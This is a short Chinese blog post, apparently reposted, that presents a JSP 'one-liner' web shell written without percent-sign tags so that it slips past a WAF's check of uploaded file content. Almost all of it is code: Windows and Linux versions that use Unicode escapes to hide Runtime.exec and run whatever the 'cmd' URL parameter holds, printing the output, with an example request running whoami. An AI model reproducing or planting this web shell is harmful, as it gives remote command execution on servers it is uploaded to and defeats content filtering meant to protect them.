码迷,mamicode.com
首页 > Web开发 > 详细

JSP无%%号命令执行一句话

时间:2020-06-20 14:01:02      阅读:83      评论:0      收藏:0      [点我收藏+]

标签:stream   其他   pre   read   lang   example   禁止用户   判断   自己   

JSP无%%号命令执行一句话

  • 利用场景:WAF 禁止用户上传可执行文件,进行了文件内容判断。
  • 后续自己回来做点其他的版本。

example:http://127.0.0.1/shell.jsp?cmd=whoami

win:

<jsp:scriptlet>
if(\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd") != \u006e\u0075\u006c\u006c){
\u0050\u0072\u006f\u0063\u0065\u0073\u0073 p = \u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063("cmd.exe /c " + \u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd"));
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d os = p.getOutputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d in = p.getInputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0044\u0061\u0074\u0061\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d dis = new java.io.DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
                out.println(disr); disr = dis.readLine(); }
}
out.println("\u0074\u0030\u0030\u006c\u0073\u0020\u0031\u0032\u0034\u0035\u0035");
</jsp:scriptlet>

Linux:


<jsp:scriptlet>
if(\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd") != \u006e\u0075\u006c\u006c){
\u0050\u0072\u006f\u0063\u0065\u0073\u0073 p = \u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063(\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd"));
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d os = p.getOutputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d in = p.getInputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0044\u0061\u0074\u0061\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d dis = new java.io.DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
                out.println(disr); disr = dis.readLine(); }
}
out.println("\u0074\u0030\u0030\u006c\u0073\u0020\u0031\u0032\u0034\u0035\u0035");
</jsp:scriptlet>

JSP无%%号命令执行一句话

标签:stream   其他   pre   read   lang   example   禁止用户   判断   自己   

原文地址:https://www.cnblogs.com/0xdd/p/13168000.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!